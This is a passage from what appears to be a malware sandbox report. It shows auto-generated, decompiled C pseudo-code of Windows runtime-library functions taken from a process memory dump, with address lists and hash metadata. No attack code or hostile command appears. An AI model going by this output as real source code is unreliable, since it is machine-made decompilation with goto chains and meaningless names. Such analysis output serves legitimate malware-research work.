												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04604620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0462F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0462F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E045E52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E045FEB70(1, 0x46d79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E045FAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E046295D0();
																			L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0462B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04623D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0462B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x04604128
0x04604135
0x0460413c
0x04604141
0x04604145
0x04604147
0x0460414e
0x04604151
0x04604159
0x0460415c
0x04604160
0x04604164
0x04604168
0x0460416c
0x0460417f
0x04604181
0x0460446a
0x0460446a
0x0460418c
0x04604195
0x04604199
0x04604432
0x04604439
0x0460443d
0x04604442
0x04604447
0x00000000
0x0460419f
0x046041a3
0x046041b1
0x046041b9
0x046041bd
0x046045db
0x046045db
0x00000000
0x046041c3
0x046041c3
0x046041ce
0x046041d4
0x0464e138
0x0464e13e
0x0464e169
0x0464e16d
0x0464e19e
0x0464e16f
0x0464e16f
0x0464e175
0x0464e179
0x0464e18f
0x0464e193
0x00000000
0x0464e199
0x00000000
0x0464e199
0x0464e193
0x00000000
0x00000000
0x00000000
0x046041da
0x046041da
0x046041df
0x046041e4
0x046041ec
0x04604203
0x04604207
0x0464e1fd
0x04604222
0x04604226
0x0464e1f3
0x0464e1f3
0x0460422c
0x0460422c
0x04604233
0x0464e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04604239
0x04604239
0x04604239
0x04604239
0x04604233
0x04604226
0x046041ee
0x046041ee
0x046041f4
0x04604575
0x0464e1b1
0x0464e1b1
0x00000000
0x0460457b
0x0460457b
0x04604582
0x0464e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x04604588
0x04604588
0x0460458c
0x0464e1c4
0x0464e1c4
0x00000000
0x04604592
0x04604592
0x04604599
0x0464e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0460459f
0x0460459f
0x046045a3
0x0464e1d7
0x0464e1e4
0x00000000
0x046045a9
0x046045a9
0x046045b0
0x0464e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x046045b6
0x046045b6
0x046045b6
0x00000000
0x046045b6
0x046045b0
0x046045a3
0x04604599
0x0460458c
0x04604582
0x00000000
0x00000000
0x00000000
0x00000000
0x046041f4
0x0460423e
0x04604241
0x046045c0
0x046045c4
0x00000000
0x046045ca
0x046045ca
0x00000000
0x0464e207
0x0464e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x046045d1
0x00000000
0x00000000
0x046045ca
0x00000000
0x04604247
0x04604247
0x04604247
0x04604249
0x04604249
0x04604249
0x04604251
0x04604251
0x04604257
0x0460425f
0x0460426e
0x04604270
0x0460427a
0x0464e219
0x0464e219
0x04604280
0x04604282
0x04604456
0x046045ea
0x00000000
0x046045f0
0x0464e223
0x00000000
0x0464e223
0x0460445c
0x0460445c
0x00000000
0x0460445c
0x00000000
0x04604288
0x0460428c
0x0464e298
0x04604292
0x04604292
0x0460429e
0x046042a3
0x046042a7
0x046042ac
0x0464e22d
0x046042b2
0x046042b2
0x046042b9
0x046042bc
0x046042c2
0x046042ca
0x046042cd
0x046042cd
0x046042d4
0x0460433f
0x0460433f
0x046042d6
0x046042d6
0x046042d9
0x046042dd
0x046042eb
0x0464e23a
0x046042f1
0x04604305
0x0460430d
0x04604315
0x04604318
0x0460431f
0x04604322
0x0460432e
0x0460433b
0x0460433b
0x00000000
0x0460432e
0x046042eb
0x0460434c
0x0460434e
0x04604352
0x04604359
0x0460435e
0x04604361
0x0460436e
0x0460438a
0x0460438e
0x04604396
0x0460439e
0x046043a1
0x046043ad
0x046043bb
0x046043bb
0x046043ad
0x0460436e
0x046043bf
0x046043c5
0x04604463
0x04604463
0x046043ce
0x046043d5
0x046043d9
0x046043df
0x04604475
0x04604479
0x04604491
0x04604491
0x04604479
0x046043e5
0x046043eb
0x046043f4
0x046043f6
0x046043f9
0x046043fc
0x046043ff
0x046044e8
0x046044ed
0x046044f3
0x0464e247
0x00000000
0x046044f9
0x04604504
0x04604508
0x0460450f
0x0464e269
0x00000000
0x04604515
0x04604519
0x04604531
0x04604534
0x04604537
0x0460453e
0x04604541
0x0460454a
0x0464e255
0x0464e255
0x0464e25b
0x0464e25e
0x0464e261
0x0464e261
0x04604555
0x04604559
0x0460455d
0x0464e26d
0x0464e270
0x0464e274
0x0464e27a
0x0464e27d
0x0464e28e
0x0464e28e
0x04604563
0x04604563
0x04604569
0x04604569
0x00000000
0x0460455d
0x0460450f
0x00000000
0x046044f3
0x046043ff
0x04604405
0x04604405
0x04604405
0x046042ac
0x0460428c
0x04604282
0x04604407
0x0460440d
0x0464e2af
0x0464e2af
0x04604413
0x04604413
0x00000000
0x046041d4
0x00000000
0x046041c3
0x046041bd
0x04604415
0x04604415
0x04604416
0x04604417
0x04604429
0x0460416e
0x0460416e
0x04604175
0x04604498
0x0460449f
0x0464e12d
0x00000000
0x0464e133
0x00000000
0x0464e133
0x046044a5
0x046044a5
0x046044aa
0x00000000
0x046044bb
0x046044ca
0x046044d6
0x046044d7
0x046044d8
0x046044e3
0x046044e3
0x046044aa
0x0460417b
0x0460417b
0x0460417b
0x00000000
0x0460417b
0x04604175
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb665f0b5e94d20b3d7ef9192aa289426313d60be1e9ecb93bff0f6d4fbe95d7
Instruction ID: 18b9477e88bcfe9d7c9808b38970a45d1876fcf80a704478f226207777bd72d6
Opcode Fuzzy Hash: cb665f0b5e94d20b3d7ef9192aa289426313d60be1e9ecb93bff0f6d4fbe95d7
Instruction Fuzzy Hash: 5FF14B706082119BC728CF59C480A3BB7E1FF98748F15892EF5858B390FB35E995DB52

Uniqueness

Uniqueness Score: -1.00%

Function 046120A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E046120A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x46d8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04612EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04612EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E045E58EC(_t240);
									_t221 =  *0x46d5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x46d5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04624A2C(0x46d6e40, 0x4624b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E04607D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x45c5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0461F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0461F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04667016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L04602400(_t267 + 0x20);
															}
															L04602400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04612397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E04602280(_t134, 0x46d8608);
									__eflags =  *0x46d6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E045FFFB0(_t198, _t241, 0x46d8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x46d6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x46d8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04616B90(_t210,  &_v64);
										_t262 =  *0x46d8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0461E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E046297C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0462006A(0x46d8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x46d8608);
												E0462B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x46d6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x46d6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E045FFFB0(_t198, _t240, 0x46d8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E046200C2(0x46d8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x046120a0
0x046120a8
0x046120ad
0x046120b3
0x046120b8
0x046120c2
0x046120c7
0x046120cb
0x046120d2
0x04612263
0x04612266
0x04655836
0x04655836
0x00000000
0x0461226c
0x0461226c
0x04612270
0x04612274
0x046120e2
0x046120e2
0x046120e6
0x046120ee
0x046557dc
0x046557de
0x046557ec
0x046557ec
0x046557f1
0x046557f3
0x046557f8
0x00000000
0x046557f8
0x046557e0
0x046557e4
0x046557ea
0x00000000
0x00000000
0x00000000
0x046557ea
0x046120f4
0x046120f4
0x046120f8
0x046120f8
0x046120fc
0x04612100
0x04612106
0x04612201
0x04612206
0x0461220b
0x0461220e
0x046122a9
0x046122ac
0x00000000
0x00000000
0x046122b2
0x046122b5
0x04655801
0x04655806
0x00000000
0x00000000
0x04655810
0x04655815
0x04655818
0x00000000
0x00000000
0x0465581e
0x046122bb
0x046122bb
0x04612218
0x04612218
0x0461221c
0x04612220
0x04612222
0x046122c2
0x046122c4
0x046122dc
0x046122dc
0x046122e1
0x00000000
0x00000000
0x00000000
0x046122e7
0x046122c8
0x046122cd
0x046122d3
0x046122d6
0x04655823
0x04655825
0x04655827
0x00000000
0x00000000
0x0465582d
0x00000000
0x0465582d
0x00000000
0x04612228
0x04612228
0x00000000
0x04612228
0x04612222
0x04612214
0x04612214
0x00000000
0x04612114
0x04612114
0x04612114
0x0461211a
0x0461211c
0x04612348
0x0461234d
0x04655840
0x04655845
0x04655848
0x0465584e
0x0465584e
0x04655848
0x04612353
0x04612355
0x04612388
0x04612388
0x04612368
0x0461236a
0x0461236c
0x0461238f
0x00000000
0x0461236e
0x0461236e
0x0461218e
0x0461218e
0x04612191
0x04612195
0x04655a03
0x04655a06
0x04655a0c
0x04655a0f
0x04655a11
0x04655a13
0x04655a13
0x04655a19
0x04655a1f
0x00000000
0x0461219b
0x0461219b
0x046121a0
0x04612282
0x04612284
0x04612284
0x04612284
0x04612284
0x046121a6
0x046121a9
0x046121ac
0x046121ae
0x046121b3
0x0461228b
0x04612290
0x04612379
0x04612296
0x04612298
0x04612298
0x04612290
0x046121b9
0x046121be
0x046122a2
0x046122a2
0x046121c4
0x046121c8
0x046121cc
0x046121d0
0x046121d4
0x046121de
0x046121e3
0x04655a29
0x04655a2c
0x00000000
0x00000000
0x04655a3b
0x00000000
0x046121e9
0x046121e9
0x046121e9
0x046121ee
0x046121f1
0x04655a45
0x04655a4b
0x04655a52
0x04655a58
0x04655a5d
0x04655a5f
0x04655a71
0x04655a61
0x04655a6a
0x04655a6a
0x04655a76
0x04655a79
0x04655a7f
0x04655a83
0x04655a85
0x04655a87
0x04655a87
0x04655a8c
0x04655a91
0x04655a97
0x04655a9f
0x04655aa0
0x04655aa1
0x04655aa6
0x04655aab
0x04655ab1
0x04655ab3
0x04655ab9
0x04655aca
0x04655ad4
0x04655ad4
0x04655ade
0x04655ade
0x04655aab
0x04655a79
0x04655a52
0x046121f7
0x046121f9
0x046121fe
0x046121fe
0x046121e3
0x04612195
0x0461236c
0x04612122
0x04612122
0x04612124
0x04612231
0x04612236
0x04612236
0x04612238
0x04612238
0x04612240
0x04612242
0x04612244
0x046559fc
0x0461218c
0x0461218c
0x00000000
0x0461218c
0x0461224a
0x0461224f
0x04612256
0x04612304
0x04612309
0x0461230f
0x0461231e
0x0461231e
0x0461231e
0x04612320
0x04612325
0x0461232a
0x0461232c
0x0461233e
0x0461233e
0x00000000
0x0461232c
0x04612311
0x04612317
0x0461231a
0x0461231c
0x04612380
0x04612380
0x04612380
0x04612384
0x00000000
0x00000000
0x04612386
0x00000000
0x0461231c
0x0461225c
0x0461225c
0x00000000
0x0461225c
0x0461212a
0x04612134
0x04612138
0x0461213d
0x04655858
0x04655863
0x04655863
0x04655867
0x0465586a
0x00000000
0x00000000
0x0465586c
0x0465586c
0x04655871
0x04655875
0x04655877
0x04655997
0x0465599c
0x046559a1
0x046559a7
0x046559a7
0x00000000
0x046559a7
0x0465587d
0x00000000
0x0465588b
0x0465588b
0x04655890
0x04655892
0x04655894
0x04655899
0x0465589b
0x046558a0
0x046558a0
0x046558aa
0x046558b2
0x046558b6
0x046558be
0x046558c6
0x046558c9
0x0465590d
0x04655917
0x0465591a
0x0465591c
0x04655920
0x04655928
0x0465592a
0x0465592c
0x0465592e
0x0465592e
0x046558cb
0x046558cd
0x046558d8
0x046558e0
0x046558f4
0x046558fe
0x046558fe
0x0465593a
0x0465593e
0x04655940
0x04655942
0x00000000
0x04655944
0x04655944
0x04655949
0x0465594e
0x0465594e
0x04655953
0x0465595b
0x04655976
0x04655976
0x0465597a
0x0465597f
0x00000000
0x00000000
0x00000000
0x00000000
0x04655981
0x04655981
0x04655981
0x04655983
0x04655988
0x0465598d
0x04655991
0x04655991
0x00000000
0x0465595d
0x0465595d
0x04655963
0x04655965
0x00000000
0x00000000
0x00000000
0x00000000
0x04655967
0x04655967
0x0465596b
0x0465596d
0x00000000
0x00000000
0x0465596f
0x04655971
0x04655971
0x04655974
0x00000000
0x00000000
0x00000000
0x04655974
0x00000000
0x04655967
0x0465595b
0x04655942
0x04655863
0x04612143
0x04612143
0x04612149
0x0461214f
0x046122f1
0x046122f6
0x00000000
0x04612173
0x04612173
0x0461217d
0x04612181
0x04612186
0x046559ae
0x046559b2
0x046559b5
0x046559b7
0x046559ba
0x046559cd
0x046559d1
0x046559d5
0x046559d9
0x046559db
0x00000000
0x00000000
0x046559dd
0x046559dd
0x046559e1
0x046559e4
0x046559e7
0x046559ee
0x046559ee
0x046559f3
0x046559f3
0x00000000
0x04612186
0x0461214f
0x04612106
0x04612266
0x046120d8
0x046120da
0x046120e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f44cebe9e05cd9878de9868fe9805ca36477603ad1aa88b0efdeb61609070c3a
Instruction ID: ba0ea3b4705ced236d8e71d82dc3ae30c067761c02b00b9cb801bda8e26acfad
Opcode Fuzzy Hash: f44cebe9e05cd9878de9868fe9805ca36477603ad1aa88b0efdeb61609070c3a
Instruction Fuzzy Hash: 8BF1F731B08341AFD725CF29C85476A77E1AF95324F08895DE996AB3A4F734F841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 045FD5E0 Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

